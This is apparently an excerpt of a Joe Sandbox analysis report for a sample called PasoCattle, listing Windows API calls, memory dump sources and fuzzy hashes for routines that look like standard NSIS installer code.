                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                      • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                      • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                      • String ID: *?|<>/":
                                                                                                                                                                      • API String ID: 589700163-165019052
                                                                                                                                                                      • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                      • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                      • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                      • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1912718029-0
                                                                                                                                                                      • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                      • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                      • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                      • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                      • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                      • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                      • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                      • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                      • String ID: !
                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                      • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                      • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                      • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                      • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                      • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                                                      • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                      • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                      • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                      • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                      Strings
                                                                                                                                                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                      • API String ID: 1697273262-1764544995
                                                                                                                                                                      • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                      • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                      • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                        • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                      • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                      • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                      • API String ID: 2577523808-3778932970
                                                                                                                                                                      • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                      • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                      • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                      • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcatwsprintf
                                                                                                                                                                      • String ID: %02x%c$...
                                                                                                                                                                      • API String ID: 3065427908-1057055748
                                                                                                                                                                      • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                      • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                      • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                      • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                      APIs
                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                      • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                      • API String ID: 2266616436-4211696005
                                                                                                                                                                      • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                      • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                      • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                      • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902
                                                                                                                                                                      • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1599320355-0
                                                                                                                                                                      • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                      • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                      • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                      • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                      • String ID: Version
                                                                                                                                                                      • API String ID: 512980652-315105994
                                                                                                                                                                      • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                      • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                      • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                      • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
